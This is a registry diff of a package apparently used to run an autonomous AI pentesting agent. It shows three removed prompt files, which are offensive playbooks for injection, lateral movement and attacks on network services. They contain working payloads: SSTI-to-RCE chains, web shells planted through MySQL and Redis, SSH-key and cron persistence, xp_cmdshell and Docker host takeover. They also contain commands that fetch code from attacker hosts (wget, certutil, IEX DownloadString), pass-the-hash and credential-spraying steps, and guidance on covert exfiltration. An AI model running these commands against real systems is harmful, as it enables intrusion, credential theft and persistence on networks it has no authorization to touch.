pentesting 0.73.13 → 0.90.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (70) hide show
  1. package/README.md +120 -44
  2. package/bin/pentesting.mjs +32 -0
  3. package/lib/runtime.mjs +419 -0
  4. package/package.json +17 -46
  5. package/scripts/postinstall.mjs +30 -0
  6. package/scripts/preflight-local.sh +24 -0
  7. package/dist/ad/prompt.md +0 -60
  8. package/dist/agent-tool-KHXXTHGS.js +0 -989
  9. package/dist/api/prompt.md +0 -63
  10. package/dist/chunk-4UNNRHYY.js +0 -5797
  11. package/dist/chunk-GILD75OT.js +0 -11407
  12. package/dist/chunk-S5ZMXFHR.js +0 -1162
  13. package/dist/cloud/prompt.md +0 -49
  14. package/dist/container/prompt.md +0 -58
  15. package/dist/database/prompt.md +0 -58
  16. package/dist/email/prompt.md +0 -44
  17. package/dist/file-sharing/prompt.md +0 -56
  18. package/dist/ics/prompt.md +0 -76
  19. package/dist/main.d.ts +0 -1
  20. package/dist/main.js +0 -9777
  21. package/dist/network/prompt.md +0 -49
  22. package/dist/persistence-U2N3KWFH.js +0 -13
  23. package/dist/process-registry-4Y3HB4YQ.js +0 -30
  24. package/dist/prompts/base.md +0 -436
  25. package/dist/prompts/ctf-crypto.md +0 -168
  26. package/dist/prompts/ctf-forensics.md +0 -182
  27. package/dist/prompts/ctf-pwn.md +0 -137
  28. package/dist/prompts/evasion.md +0 -215
  29. package/dist/prompts/exploit.md +0 -416
  30. package/dist/prompts/infra.md +0 -114
  31. package/dist/prompts/llm/analyst-system.md +0 -76
  32. package/dist/prompts/llm/context-extractor-system.md +0 -19
  33. package/dist/prompts/llm/input-processor-system.md +0 -64
  34. package/dist/prompts/llm/memory-synth-system.md +0 -14
  35. package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
  36. package/dist/prompts/llm/reflector-system.md +0 -16
  37. package/dist/prompts/llm/report-generator-system.md +0 -21
  38. package/dist/prompts/llm/strategist-fallback.md +0 -9
  39. package/dist/prompts/llm/triage-system.md +0 -47
  40. package/dist/prompts/main-agent.md +0 -193
  41. package/dist/prompts/offensive-playbook.md +0 -250
  42. package/dist/prompts/payload-craft.md +0 -181
  43. package/dist/prompts/post.md +0 -185
  44. package/dist/prompts/recon.md +0 -296
  45. package/dist/prompts/report.md +0 -98
  46. package/dist/prompts/strategist-system.md +0 -472
  47. package/dist/prompts/strategy.md +0 -163
  48. package/dist/prompts/techniques/README.md +0 -40
  49. package/dist/prompts/techniques/ad-attack.md +0 -261
  50. package/dist/prompts/techniques/auth-access.md +0 -256
  51. package/dist/prompts/techniques/container-escape.md +0 -103
  52. package/dist/prompts/techniques/crypto.md +0 -296
  53. package/dist/prompts/techniques/enterprise-pentest.md +0 -175
  54. package/dist/prompts/techniques/file-attacks.md +0 -144
  55. package/dist/prompts/techniques/forensics.md +0 -313
  56. package/dist/prompts/techniques/injection.md +0 -217
  57. package/dist/prompts/techniques/lateral.md +0 -128
  58. package/dist/prompts/techniques/network-svc.md +0 -229
  59. package/dist/prompts/techniques/pivoting.md +0 -205
  60. package/dist/prompts/techniques/privesc.md +0 -190
  61. package/dist/prompts/techniques/pwn.md +0 -595
  62. package/dist/prompts/techniques/reversing.md +0 -183
  63. package/dist/prompts/techniques/sandbox-escape.md +0 -73
  64. package/dist/prompts/techniques/shells.md +0 -194
  65. package/dist/prompts/vuln.md +0 -190
  66. package/dist/prompts/web.md +0 -318
  67. package/dist/prompts/zero-day.md +0 -298
  68. package/dist/remote-access/prompt.md +0 -52
  69. package/dist/web/prompt.md +0 -59
  70. package/dist/wireless/prompt.md +0 -62
@@ -1,217 +0,0 @@
1
- # Injection Attacks — Comprehensive Autonomous Guide
2
-
3
- > **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
4
- > Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
5
- > to decide what to test and in what order. Adapt dynamically — not to this list.
6
-
7
- > **Cross-ref**: web.md (web testing), evasion.md (bypass), payload-craft.md (mutation)
8
-
9
- ## Core Principle
10
- Every input is a potential injection point. There are 20+ injection TYPES,
11
- each with hundreds of variants. **You cannot memorize them all — SEARCH for each.**
12
-
13
- ## Injection Type Map (Know ALL Categories)
14
-
15
- ```
16
- INJECTION TYPES — Complete Category Awareness:
17
-
18
- ├── 1. SQL Injection (SQLi)
19
- │ ├── In-band: UNION-based, Error-based
20
- │ ├── Blind: Boolean-based, Time-based
21
- │ ├── Out-of-band: DNS/HTTP exfiltration
22
- │ ├── Second-order: stored then triggered
23
- │ ├── Stacked queries: multiple statements
24
- │ └── DB-specific: MySQL, PostgreSQL, MSSQL, Oracle, SQLite (each has unique syntax)
25
-
26
- ├── 2. Command Injection (CMDi / OS Injection)
27
- │ ├── Direct: ; | & && || ` $()
28
- │ ├── Blind: timing-based (sleep/ping), out-of-band (DNS/HTTP callback)
29
- │ ├── Argument injection: --option=malicious
30
- │ └── Environment variable injection
31
-
32
- ├── 3. Server-Side Template Injection (SSTI)
33
- │ ├── Jinja2 (Python): {{7*7}}, {{config}}, {{''.__class__.__mro__[2].__subclasses__()}}
34
- │ ├── Twig (PHP): {{7*7}}, {{_self.env.registerUndefinedFilterCallback("exec")}}
35
- │ ├── Freemarker (Java): ${7*7}, <#assign ex="freemarker.template.utility.Execute"?new()>
36
- │ ├── ERB (Ruby): <%=7*7%>, <%=system('id')%>
37
- │ ├── Pug/Jade (Node): #{7*7}
38
- │ ├── Velocity (Java): #set($x=7*7)$x
39
- │ └── DETECTION: Send polyglot → {{7*7}}${7*7}<%=7*7%>${{7*7}} → see what evaluates
40
-
41
- ├── 4. Cross-Site Scripting (XSS)
42
- │ ├── Reflected, Stored, DOM-based, Blind
43
- │ ├── Context: HTML body, attribute, JavaScript, URL, CSS, SVG, MathML
44
- │ ├── Payloads: <script>, <img onerror>, <svg onload>, event handlers, javascript: URI
45
- │ └── Impact: session theft, keylogging, phishing, crypto mining, worm
46
-
47
- ├── 5. XML External Entity (XXE)
48
- │ ├── Classic: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
49
- │ ├── Blind: out-of-band via DTD + HTTP/DNS callback
50
- │ ├── Error-based: trigger error containing file content
51
- │ ├── Through: SOAP, SVG upload, DOCX/XLSX, RSS feeds, SAML
52
- │ └── Variants: XInclude, XSLT injection
53
-
54
- ├── 6. LDAP Injection
55
- │ ├── Authentication bypass: *)(&
56
- │ ├── Data extraction: )(cn=*)
57
- │ └── Blind: timing/error differences
58
-
59
- ├── 7. NoSQL Injection
60
- │ ├── MongoDB: {"$gt":""}, {"$ne":""}, {"$regex":".*"}
61
- │ ├── Authentication bypass: {"username":{"$ne":""},"password":{"$ne":""}}
62
- │ └── Operator injection: $where, $regex, $gt, $ne
63
-
64
- ├── 8. XPath Injection
65
- │ ├── Similar to SQLi but for XML: ' or '1'='1
66
- │ └── Blind: boolean/timing based
67
-
68
- ├── 9. CRLF Injection
69
- │ ├── Header injection: %0d%0a
70
- │ ├── Can lead to: HTTP response splitting, XSS, cache poisoning
71
- │ └── Log injection: inject fake log entries
72
-
73
- ├── 10. Header Injection
74
- │ ├── Host header: password reset poisoning, routing bypass
75
- │ ├── X-Forwarded-For: IP-based access control bypass
76
- │ ├── X-Original-URL / X-Rewrite-URL: path-based access control bypass
77
- │ └── Referer: SSRF via referer processing
78
-
79
- ├── 11. SSTI → RCE Chains (template-specific)
80
- │ └── web_search("{template_engine} SSTI to RCE payload")
81
-
82
- ├── 12. Expression Language Injection (EL Injection)
83
- │ ├── Java EE: ${7*7}, #{7*7}
84
- │ └── Spring: *{7*7}
85
-
86
- ├── 13. Code Injection
87
- │ ├── PHP: eval(), assert(), preg_replace with /e
88
- │ ├── Python: eval(), exec(), input() (Python 2)
89
- │ ├── Ruby: eval(), system()
90
- │ └── Node: eval(), Function()
91
-
92
- ├── 14. CSV Injection (Formula Injection)
93
- │ ├── =cmd|'/C calc'!A0 (Excel)
94
- │ └── Through exported CSV/XLSX files
95
-
96
- ├── 15. Email Header Injection
97
- │ ├── %0aCc: attacker@evil.com
98
- │ └── Add arbitrary recipients, modify headers
99
-
100
- ├── 16. HTTP Parameter Pollution (HPP)
101
- │ ├── ?param=good&param=evil (server picks which?)
102
- │ └── Bypass WAF by splitting payload across same-name params
103
-
104
- ├── 17. Prototype Pollution (JavaScript)
105
- │ ├── __proto__[isAdmin]=true
106
- │ ├── constructor.prototype.isAdmin=true
107
- │ └── Can lead to: RCE, auth bypass, DoS
108
-
109
- ├── 18. Insecure Deserialization
110
- │ ├── Java: ObjectInputStream → gadget chains (ysoserial)
111
- │ ├── PHP: unserialize() → POP chains (phpggc)
112
- │ ├── Python: pickle.loads() → __reduce__ → RCE
113
- │ ├── .NET: BinaryFormatter, JSON.NET TypeNameHandling
114
- │ ├── Ruby: Marshal.load()
115
- │ └── Node: node-serialize
116
-
117
- ├── 19. GraphQL Injection
118
- │ ├── Introspection: {__schema{types{name,fields{name}}}}
119
- │ ├── Batching for brute force bypass
120
- │ ├── Nested queries for DoS
121
- │ └── Mutation discovery → unauthorized operations
122
-
123
- └── 20. WebSocket Injection
124
- ├── Same injection types apply through WebSocket messages
125
- └── Often LESS filtered than HTTP requests
126
- ```
127
-
128
- ## 🧠 Injection Discovery — Autonomous Decision Tree
129
-
130
- ```
131
- FOR EVERY input point discovered:
132
-
133
- 1. IDENTIFY context: Where does this input go?
134
- ├── Database query → SQLi/NoSQLi
135
- ├── System command → CMDi
136
- ├── Template render → SSTI
137
- ├── XML parser → XXE
138
- ├── File path → LFI/RFI (see file-attacks.md)
139
- ├── HTTP header → Header injection / CRLF
140
- ├── LDAP query → LDAPi
141
- ├── HTML output → XSS
142
- ├── Deserialization → Insecure deserialization
143
- └── Unknown → try ALL categories with detection probes
144
-
145
- 2. DETECTION PROBES (send these to identify vulnerability type):
146
- ├── ' " ; — → SQL errors?
147
- ├── {{7*7}} ${7*7} → Template evaluation?
148
- ├── ;id ;whoami |id → Command output?
149
- ├── <script>alert(1)</script> → XSS rendering?
150
- ├── <!--#exec cmd="id"--> → SSI?
151
- ├── %0d%0aHeader:injected → CRLF?
152
- └── ANY behavioral difference (error, timing, output) = signal
153
-
154
- 3. CONFIRM → find the exact injection type and context
155
- 4. EXPLOIT → web_search("{injection_type} exploitation payloads hacktricks")
156
- 5. BLOCKED? → payload_mutate + evasion.md → try encoded variants
157
- 6. CHAIN → injection → RCE → shell → privesc (see shells.md, privesc.md)
158
- ```
159
-
160
- ## Injection Search Patterns
161
-
162
- ```
163
- For EVERY injection type discovered:
164
-
165
- web_search("{injection_type} exploit payloads hacktricks")
166
- web_search("{injection_type} {database/language} cheatsheet")
167
- web_search("{injection_type} bypass WAF filter")
168
- web_search("{injection_type} blind extraction techniques")
169
- web_search("{injection_type} to RCE")
170
- web_search("PayloadsAllTheThings {injection_type}")
171
-
172
- Automated tools (where applicable):
173
- ├── SQLi: sqlmap -u URL --forms --batch --level=5 --risk=3
174
- ├── XSS: dalfox url URL
175
- ├── SSTI: tplmap -u URL
176
- ├── CMDi: commix --url=URL
177
- ├── XXE: xxeinjector
178
- └── General: nuclei -u URL -as
179
- ```
180
-
181
- ## Injection → RCE Chains
182
- ```
183
- Goal: Every injection should eventually lead to RCE if possible.
184
-
185
- SQLi → RCE:
186
- ├── MySQL: INTO OUTFILE webshell, UDF, sys_exec
187
- ├── PostgreSQL: COPY TO file, lo_export, pg_read_file
188
- ├── MSSQL: xp_cmdshell, sp_OACreate
189
- ├── Oracle: DBMS_SCHEDULER, Java stored procedures
190
- └── SQLite: load_extension()
191
-
192
- SSTI → RCE:
193
- ├── Jinja2: {{config.__class__.__init__.__globals__['os'].popen('id').read()}}
194
- ├── Twig: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
195
- ├── Each engine has different paths → SEARCH for specific engine
196
- └── web_search("{engine} SSTI RCE payload")
197
-
198
- XXE → impact:
199
- ├── File read → credentials → further access
200
- ├── SSRF → internal service access
201
- ├── RCE (rare): expect:// wrapper (PHP), xslt:// extensions
202
- └── Blind → out-of-band data exfiltration
203
-
204
- XSS → impact:
205
- ├── Session theft → admin access
206
- ├── Blind XSS → admin panel compromise
207
- ├── DOM manipulation → credential theft
208
- ├── Worm → self-spreading XSS
209
- └── Keylogging → capture all input
210
-
211
- Deserialization → RCE:
212
- ├── Java: ysoserial → choose correct gadget chain for target libraries
213
- ├── PHP: phpggc → choose correct POP chain
214
- ├── Python: pickle → __reduce__ method
215
- ├── .NET: ysoserial.net
216
- └── ALWAYS: web_search("{framework} deserialization gadget chain RCE")
217
- ```
@@ -1,128 +0,0 @@
1
- # Lateral Movement & Pivoting — Comprehensive Autonomous Guide
2
-
3
- > **Cross-ref**: shells.md (shell access), ad-attack.md (AD movement), privesc.md (escalation)
4
-
5
- ## Core Principle
6
- Initial access is one machine. Lateral movement = entire network.
7
- Every credential, hash, token, and key is a potential pivot point.
8
-
9
- ## Lateral Movement Techniques
10
-
11
- ```
12
- LATERAL MOVEMENT MAP:
13
-
14
- ├── 1. Credential-Based Movement
15
- │ ├── SSH with credentials: ssh user@TARGET
16
- │ ├── SSH with key: ssh -i stolen_id_rsa user@TARGET
17
- │ ├── RDP: xfreerdp /v:TARGET /u:user /p:pass /cert:ignore
18
- │ ├── WinRM: evil-winrm -i TARGET -u user -p pass
19
- │ ├── PsExec: impacket-psexec user:pass@TARGET
20
- │ ├── WMI: impacket-wmiexec user:pass@TARGET
21
- │ ├── SMBExec: impacket-smbexec user:pass@TARGET
22
- │ ├── DCOM: impacket-dcomexec user:pass@TARGET
23
- │ ├── Pass-the-Hash: impacket-psexec -hashes :NTLM_HASH user@TARGET
24
- │ ├── Pass-the-Ticket: export KRB5CCNAME=ticket.ccache → impacket tools -k
25
- │ └── Credential spraying: try EVERY found credential on EVERY accessible service
26
-
27
- ├── 2. Network Pivoting (Access Hidden Networks)
28
- │ ├── SSH tunneling:
29
- │ │ ├── Local: ssh -L LOCAL_PORT:INTERNAL_HOST:INTERNAL_PORT user@PIVOT
30
- │ │ ├── Dynamic SOCKS: ssh -D 9050 user@PIVOT → proxychains
31
- │ │ ├── Remote: ssh -R ATTACKER_PORT:INTERNAL_HOST:PORT user@ATTACKER
32
- │ │ └── ProxyJump: ssh -J user@PIVOT user@INTERNAL
33
- │ │
34
- │ ├── Chisel (recommended for non-SSH):
35
- │ │ ├── Server (attacker): chisel server -p 8080 --reverse
36
- │ │ ├── Client (pivot): chisel client ATTACKER:8080 R:socks
37
- │ │ └── Then: proxychains nmap -Pn INTERNAL_SUBNET
38
- │ │
39
- │ ├── Ligolo-ng (easiest for complex pivoting):
40
- │ │ ├── Proxy (attacker): ligolo-proxy -selfcert -laddr 0.0.0.0:PORT
41
- │ │ ├── Agent (pivot): ligolo-agent -connect ATTACKER:PORT -ignore-cert
42
- │ │ └── Add routes to internal networks from attacker
43
- │ │
44
- │ ├── socat:
45
- │ │ ├── Port forwarding: socat TCP-LISTEN:LOCAL,fork TCP:INTERNAL:PORT
46
- │ │ └── Useful on systems without SSH
47
- │ │
48
- │ ├── sshuttle: sshuttle -r user@PIVOT INTERNAL_SUBNET/24
49
- │ │ └── Transparent proxy — no need for proxychains
50
- │ │
51
- │ ├── Metasploit: route add SUBNET MASK SESSION
52
- │ │ └── autoroute + socks_proxy modules
53
- │ │
54
- │ ├── Windows-specific:
55
- │ │ ├── netsh portproxy: netsh interface portproxy add v4tov4 listenport=P connectaddress=HOST connectport=P
56
- │ │ ├── plink.exe: plink -ssh -L LOCAL:INTERNAL:PORT user@PIVOT
57
- │ │ └── web_search("windows port forwarding pivoting techniques")
58
- │ │
59
- │ └── web_search("pivoting tunneling techniques {tool} hacktricks")
60
-
61
- ├── 3. File Transfer (Getting Tools Where They Need to Go)
62
- │ ├── Linux upload to target:
63
- │ │ ├── wget/curl: wget http://ATTACKER:PORT/file -O /tmp/file
64
- │ │ ├── Python HTTP server: python3 -m http.server PORT (on attacker)
65
- │ │ ├── scp: scp file user@TARGET:/tmp/
66
- │ │ ├── Netcat: nc -lvnp PORT > file (recv) | nc TARGET PORT < file (send)
67
- │ │ ├── Base64: base64 file → echo 'B64' | base64 -d > file
68
- │ │ └── /dev/tcp: cat < /dev/tcp/ATTACKER/PORT > file
69
- │ │
70
- │ ├── Windows upload to target:
71
- │ │ ├── certutil: certutil -urlcache -split -f http://ATTACKER/file file
72
- │ │ ├── PowerShell: IWR -Uri http://ATTACKER/file -OutFile file
73
- │ │ ├── bitsadmin: bitsadmin /transfer job /download /priority high URL file
74
- │ │ ├── SMB: copy \\ATTACKER\share\file . (start smbserver on attacker)
75
- │ │ └── In-memory: IEX(New-Object Net.WebClient).DownloadString('http://ATK/ps1')
76
- │ │
77
- │ └── web_search("file transfer techniques {OS} hacktricks")
78
-
79
- ├── 4. Internal Network Discovery
80
- │ ├── From compromised host:
81
- │ │ ├── ip a, ifconfig, ipconfig /all → network interfaces
82
- │ │ ├── ip route, route -n, route print → routing tables
83
- │ │ ├── arp -a → known hosts in local network
84
- │ │ ├── cat /etc/hosts, type C:\Windows\System32\drivers\etc\hosts
85
- │ │ ├── netstat -antp → active connections → more targets
86
- │ │ ├── Internal port scan: for i in $(seq 1 254); do ping -c1 -W1 10.0.0.$i; done
87
- │ │ └── proxychains nmap -sT -Pn -p- INTERNAL_SUBNET (through pivot)
88
- │ │
89
- │ └── EVERY new network found = FULL reconnaissance cycle (rerun everything)
90
-
91
- ├── 5. Credential Reuse Strategy
92
- │ ├── Every found credential → test on ALL reachable services:
93
- │ │ ├── SSH, RDP, WinRM, SMB, FTP, databases, web logins, VPN
94
- │ │ ├── crackmapexec smb SUBNET/24 -u user -p pass → mass test
95
- │ │ ├── Same password with different usernames
96
- │ │ ├── Same username with slight password variations
97
- │ │ └── Hash-based: Pass-the-Hash to all Windows targets
98
- │ │
99
- │ └── Credential chain: creds from host A → access host B → creds from B → access C
100
-
101
- └── 6. Covert Channels
102
- ├── DNS tunneling: iodine, dnscat2 → bypass network restrictions
103
- ├── ICMP tunneling: icmpsh, ptunnel
104
- ├── HTTP tunneling: through web proxies
105
- ├── WebSocket tunneling: through WAF
106
- └── web_search("covert channel exfiltration tunneling {protocol}")
107
- ```
108
-
109
- ## Pivoting Workflow
110
- ```
111
- Got access to new host?
112
- 1. STABILIZE: upgrade shell, set up persistence (shells.md)
113
- 2. ENUMERATE: network interfaces, routes, ARP, connections, hosts file
114
- 3. LOOT: credentials, keys, tokens, hashes, config files
115
- 4. PIVOT: set up tunnel/proxy to newly discovered networks
116
- 5. SCAN: recon the new network through the pivot
117
- 6. SPRAY: test found credentials on all new services
118
- 7. REPEAT: for each new host compromised
119
- ```
120
-
121
- ## Search Patterns
122
- ```
123
- web_search("pivoting techniques {tool_name} hacktricks")
124
- web_search("file transfer {OS} one-liner techniques")
125
- web_search("{protocol} tunneling tool pivot")
126
- web_search("proxychains {tool} through pivot")
127
- web_search("lateral movement {technique} detection evasion")
128
- ```
@@ -1,229 +0,0 @@
1
- # Network Service Attacks — Comprehensive Autonomous Guide
2
-
3
- > **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
4
- > Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
5
- > to decide what to test and in what order. Adapt dynamically — not to this list.
6
-
7
- > **Cross-ref**: recon.md (discovery), exploit.md (exploitation), shells.md (getting shell)
8
-
9
- ## Core Principle
10
- Every open port is an attack surface. Every service has known and unknown vulnerabilities.
11
- **ALWAYS: service detection → version → IMMEDIATE web_search for exploits.**
12
-
13
- ## Service Attack Decision Engine
14
-
15
- ```
16
- FOR EVERY OPEN PORT DISCOVERED:
17
-
18
- ├── 1. IDENTIFY: nmap -Pn -sV -sC -p PORT TARGET → exact version
19
- ├── 2. SEARCH: web_search("{service} {version} exploit CVE hacktricks")
20
- ├── 3. CHECK: searchsploit {service} {version}
21
- ├── 4. READ: browse_url(hacktricks_result) → learn attack methodology
22
- ├── 5. ATTACK: apply known techniques + search for bypasses
23
- ├── 6. BLOCKED: evasion.md + payload_mutate → try encoded/alternative
24
- └── 7. CHAIN: combine with other findings (see strategy.md)
25
- ```
26
-
27
- ## 🌐 Web Services (80, 443, 8080, 8443)
28
-
29
- ```
30
- Web Server Identified → FULL WEB PIPELINE:
31
- ├── Technology: whatweb, wappalyzer, curl headers
32
- ├── CMS detection → CMS-specific scanner:
33
- │ WordPress → wpscan --enumerate vp,vt,u --plugins-detection aggressive
34
- │ Drupal → droopescan scan drupal -u URL
35
- │ Joomla → joomscan -u URL
36
- │ web_search("{CMS} {version} exploit CVE")
37
-
38
- ├── Content discovery (MANDATORY):
39
- │ ├── ffuf -u URL/FUZZ -w /usr/share/wordlists/dirb/big.txt -fc 404
40
- │ ├── feroxbuster -u URL --smart --auto-tune
41
- │ ├── gobuster dir -u URL -w wordlist -x php,asp,aspx,jsp,html,js,txt,bak
42
- │ ├── Try backup extensions: .bak, .old, .orig, .save, .swp, ~, .tmp
43
- │ └── Add technology-specific extensions to wordlist
44
-
45
- ├── Sensitive file check:
46
- │ .env, .git/HEAD, .DS_Store, .htaccess, web.config,
47
- │ robots.txt, sitemap.xml, crossdomain.xml, clientaccesspolicy.xml,
48
- │ phpinfo.php, server-status, server-info, info.php, test.php
49
-
50
- ├── API discovery:
51
- │ /api, /api/v1, /swagger, /swagger-ui, /openapi.json,
52
- │ /graphql, /graphiql, /api-docs, /.well-known/
53
-
54
- ├── Virtual hosts: ffuf -H "Host: FUZZ.TARGET" -u http://IP -w subdomains.txt
55
-
56
- └── Deep web testing → see injection.md, auth-access.md, file-attacks.md
57
- ```
58
-
59
- ## 🔐 Authentication Services
60
-
61
- ```
62
- SSH (22):
63
- ├── Version CVE: web_search("OpenSSH {version} CVE exploit")
64
- ├── Username enumeration: web_search("openssh {version} user enumeration CVE")
65
- ├── Brute force: hydra -l root -P wordlist ssh://TARGET
66
- ├── Key-based: try found keys from other hosts
67
- ├── Agent forwarding: if forwarded → hijack to access other hosts
68
- └── Misconfig: check for weak algorithms, passwordless login
69
-
70
- FTP (21):
71
- ├── Anonymous: ftp TARGET → anonymous / (empty password)
72
- ├── Version CVE: web_search("{ftpd} {version} exploit")
73
- ├── Brute force: hydra -l admin -P wordlist ftp://TARGET
74
- ├── Writable dirs: if serves web → upload web shell
75
- ├── Bounce attack: use FTP to scan internal ports
76
- └── PASV mode: reveals internal IP addresses
77
-
78
- Telnet (23):
79
- ├── Often unencrypted → capture credentials
80
- ├── Default creds: web_search("{device} telnet default credentials")
81
- └── Version exploits: web_search("telnet {version} CVE")
82
-
83
- RDP (3389):
84
- ├── BlueKeep: nmap -Pn --script rdp-vuln-ms12-020 -p 3389 TARGET
85
- ├── Brute force: hydra -l admin -P wordlist rdp://TARGET
86
- ├── NLA bypass: web_search("RDP NLA bypass technique")
87
- ├── Credentials: try EVERY found credential
88
- └── Pass-the-Hash: xfreerdp /v:TARGET /u:admin /pth:NTLM -sec-nla
89
-
90
- VNC (5900-5910):
91
- ├── No auth: vncviewer TARGET::5900
92
- ├── Brute force: hydra -P wordlist -s 5900 TARGET vnc
93
- ├── VNC authentication bypass: web_search("VNC auth bypass")
94
- └── Decrypt stored password: web_search("vnc password decrypt")
95
-
96
- WinRM (5985/5986):
97
- ├── evil-winrm -i TARGET -u user -p pass
98
- ├── Pass-the-Hash: evil-winrm -i TARGET -u user -H NTLM_HASH
99
- └── If valid creds → full PowerShell access
100
- ```
101
-
102
- ## 📂 File Sharing Services
103
-
104
- ```
105
- SMB (139/445):
106
- ├── Null session: smbclient -L //TARGET -N, smbmap -H TARGET -u '' -p ''
107
- ├── Guest: smbmap -H TARGET -u 'guest' -p ''
108
- ├── Enumerate shares: crackmapexec smb TARGET --shares -u '' -p ''
109
- ├── Download everything: smbget -R smb://TARGET/share
110
- ├── Writable share: upload payload (web shell if web-accessible, batch/exe if executed)
111
- ├── Vulnerabilities:
112
- │ ├── EternalBlue (MS17-010): nmap -Pn --script smb-vuln-ms17-010
113
- │ ├── PrintNightmare: web_search("printnightmare exploit")
114
- │ ├── SMB relay: Responder + ntlmrelayx
115
- │ └── web_search("SMB {version} CVE exploit")
116
- ├── Password spray: crackmapexec smb TARGET -u users.txt -p passwords.txt
117
- └── Enum: crackmapexec smb TARGET -u user -p pass --users --groups --loggedon-users
118
-
119
- NFS (2049):
120
- ├── Show exports: showmount -e TARGET
121
- ├── Mount: mount -t nfs TARGET:/share /mnt/nfs
122
- ├── Check no_root_squash → create SUID binary on share → execute on target
123
- └── web_search("NFS exploitation no_root_squash")
124
-
125
- Rsync (873):
126
- ├── List modules: rsync -av --list-only rsync://TARGET/
127
- ├── Download: rsync -av rsync://TARGET/share/ ./loot/
128
- └── If writable: upload malicious crontab/authorized_keys
129
- ```
130
-
131
- ## Database Services
132
-
133
- ```
134
- MySQL (3306):
135
- ├── mysql -h TARGET -u root (no password)
136
- ├── mysql -h TARGET -u root -p'root' (common passwords)
137
- ├── Brute force: hydra -l root -P wordlist mysql://TARGET
138
- ├── UDF: web_search("mysql UDF privilege escalation")
139
- ├── INTO OUTFILE: SELECT '<?php system($_GET["cmd"]);?>' INTO OUTFILE '/var/www/html/cmd.php'
140
- ├── LOAD_FILE: SELECT LOAD_FILE('/etc/passwd')
141
- └── web_search("mysql {version} CVE exploit")
142
-
143
- PostgreSQL (5432):
144
- ├── psql -h TARGET -U postgres (often trust/peer auth)
145
- ├── COPY TO: COPY (SELECT 'shell') TO '/tmp/shell.sh'
146
- ├── pg_read_file: SELECT pg_read_file('/etc/passwd')
147
- ├── Large objects: read/write arbitrary files
148
- ├── Extension: CREATE EXTENSION dblink → SSRF
149
- └── web_search("postgresql {version} RCE exploit")
150
-
151
- MSSQL (1433):
152
- ├── impacket-mssqlclient DOMAIN/user:pass@TARGET
153
- ├── xp_cmdshell: EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami'
154
- ├── UNC path: EXEC xp_dirtree '\\ATTACKER\share' → capture NTLMv2
155
- ├── OLE automation: sp_OACreate for command execution
156
- ├── CLR assembly: custom .NET DLL → load and execute
157
- └── web_search("MSSQL exploitation techniques {year}")
158
-
159
- Redis (6379):
160
- ├── redis-cli -h TARGET (check no-auth)
161
- ├── INFO → version, OS, memory
162
- ├── Web shell: CONFIG SET dir /var/www/html; CONFIG SET dbfilename shell.php; SET x "<?php system($_GET['cmd']);?>"; SAVE
163
- ├── SSH key: CONFIG SET dir /root/.ssh; CONFIG SET dbfilename authorized_keys; SET x "KEY_DATA"; SAVE
164
- ├── Cron: CONFIG SET dir /var/spool/cron/crontabs; SET x "reverse_shell_cron"; SAVE
165
- ├── Master-slave RCE: MODULE LOAD via replication
166
- └── web_search("redis {version} RCE exploit")
167
-
168
- MongoDB (27017):
169
- ├── mongosh mongodb://TARGET:27017 (no auth)
170
- ├── db.adminCommand({listDatabases:1})
171
- ├── Dump all: for each db → show collections → db.collection.find()
172
- ├── Authentication bypass: web_search("mongodb auth bypass")
173
- └── web_search("mongodb {version} CVE")
174
-
175
- Elasticsearch (9200):
176
- ├── curl http://TARGET:9200/ → version info
177
- ├── curl http://TARGET:9200/_cat/indices → list all indices
178
- ├── curl http://TARGET:9200/_search?q=password → search for secrets
179
- ├── RCE: web_search("elasticsearch {version} RCE CVE")
180
- └── Snapshot API → read filesystem
181
- ```
182
-
183
- ## 📧 Other Common Services
184
-
185
- ```
186
- SMTP (25/587):
187
- ├── User enum: VRFY/EXPN/RCPT TO
188
- ├── Open relay: send from any address
189
- ├── web_search("smtp user enumeration techniques")
190
-
191
- DNS (53):
192
- ├── Zone transfer: dig axfr @TARGET domain.com
193
- ├── Subdomain brute: fierce, dnsrecon, ffuf
194
- ├── DNS cache snooping: information about internal infrastructure
195
- └── web_search("DNS exploitation techniques")
196
-
197
- SNMP (161/162):
198
- ├── snmpwalk -v2c -c public TARGET
199
- ├── Community brute: onesixtyone -c community.txt TARGET
200
- ├── Writable OIDs → RCE: web_search("SNMP RCE write community")
201
- └── Version 3: credential brute force
202
-
203
- LDAP (389/636):
204
- ├── Anonymous bind: ldapsearch -x -H ldap://TARGET -s base
205
- ├── User/group enumeration
206
- ├── LDAP injection: see injection.md
207
- └── Detailed methodology: web_search("LDAP pentesting hacktricks")
208
-
209
- Docker API (2375/2376):
210
- ├── curl http://TARGET:2375/images/json (if unauthenticated)
211
- ├── Full RCE: docker -H tcp://TARGET:2375 run -v /:/mnt alpine chroot /mnt
212
- └── Kubernetes: kubectl --server=https://TARGET:6443 get pods
213
-
214
- Kerberos (88):
215
- ├── User enumeration: kerbrute userenum --dc DC -d DOMAIN users.txt
216
- ├── AS-REP roasting: impacket-GetNPUsers (see ad-attack.md)
217
- ├── Kerberoasting: impacket-GetUserSPNs (see ad-attack.md)
218
- └── web_search("kerberos attack techniques {year}")
219
- ```
220
-
221
- ## Universal Service Search Pattern
222
- ```
223
- web_search("{service_name} {version} exploit hacktricks")
224
- web_search("{service_name} pentesting cheatsheet")
225
- web_search("{service_name} {version} CVE PoC")
226
- web_search("{service_name} default credentials")
227
- web_search("{service_name} security misconfiguration")
228
- searchsploit {service_name} {version}
229
- ```